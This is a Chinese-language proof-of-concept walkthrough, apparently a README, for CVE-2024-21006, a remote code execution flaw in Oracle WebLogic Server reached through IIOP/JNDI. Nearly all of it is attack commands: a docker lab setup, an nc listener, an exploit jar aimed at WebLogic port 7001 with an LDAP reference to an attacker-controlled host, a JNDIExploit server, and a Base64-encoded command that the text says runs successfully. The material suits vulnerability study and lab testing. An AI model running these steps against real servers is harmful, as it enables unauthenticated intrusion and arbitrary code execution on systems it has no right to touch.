CVE-2024-21006 是一个影响 Oracle WebLogic Server 的严重远程代码执行 (RCE) 漏洞。该缺陷与 IIOP(Internet Inter-ORB 协议)和 JNDI(Java 命名和目录接口)协议的不安全使用有关,允许未经认证的远程攻击者通过恶意 JNDI 引用在受影响的服务器上执行任意代码。
搭建环境:
docker-compose up -d
要访问 Kali 的 Shell:
docker exec -it cve-2024-21006_poc-kali-1 /bin/bash
要访问 WebLogic 的 Shell:
docker exec -it cve-2024-21006_poc-weblogic-1 /bin/bash
要访问 ExploitBox 的 Shell:
docker exec -it exploitbox /bin/bash
在这一步,我们有一个本地运行的 WebLogic 12.2.1.3.0 实例: http://127.0.0.1:7001/console/login/LoginForm.jsp

在 Kali 上:
nc -vnlp 1389
在 ExploitBox 上:
java -jar CVE-2024-21006.jar <WebLogic 的 IP> 7001 ldap://<Kali 的 IP>:1389
可以看到 Kali 收到了来自 WebLogic 的连接:

在 Kali 上启动 JNDIExploit:
cd /exploit
java \
--add-exports java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \
--add-exports java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \
--add-exports java.xml/com.sun.org.apache.xalan.internal.xsltc=ALL-UNNAMED \
--add-exports java.xml/com.sun.org.apache.xml.internal.serializer=ALL-UNNAMED \
-jar JNDIExploit/JNDIExploit-1.3-SNAPSHOT.jar -i <Kali 的 IP>

在 ExploitBox 上执行 exploit:
java -jar CVE-2024-21006.jar <WebLogic 的 IP> 7001 "ldap://<Kali 的 IP>:1389/Basic/Command/Base64/<Base64 编码的命令>"

在 Kali 上可以看到我们收到了请求:

在 WebLogic 上可以看到命令已成功执行,文件已创建成功:
